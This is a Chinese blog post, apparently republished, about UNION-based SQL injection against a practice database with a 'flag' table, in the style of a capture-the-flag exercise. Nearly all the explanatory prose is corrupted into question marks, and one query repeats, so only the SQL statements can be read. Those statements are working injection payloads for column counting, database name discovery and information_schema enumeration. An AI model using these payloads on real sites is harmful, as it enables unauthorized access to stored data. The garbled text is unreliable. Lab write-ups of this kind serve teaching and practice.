本文共 1499 字,大约阅读时间需要 4 分钟。
??????????????????????????????????????SQL?????????????select * from news where id=1 order by 1???????????????????????????
?????????????????????SQL???select * from news where id=1 and 1=2 union select 1,database()
union?????????database()?????????????????????????????? ????????????????group_concat????columns??????????????????????????select * from news where id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
????????????information_schema????????????????????????????????????select * from information_schema.tables where table_schema='sqli'
group_concat?????????????????????????? union?????union????????????????????????SELECT???????????????????????????????????select * from news where id=1 and 1=2 union select 1,database()
??????????????????SQL???select * from information_schema.databases
?????????????????????select count(*) from information_schema.tables where table_schema='sqli'
???????????????????????select table_name from information_schema.tables where table_schema='sqli'
?????????????????select column_name from information_schema.columns where table_name='flag'
???????????????????????select * from sqli.flag
转载地址:http://zhlx.baihongyu.com/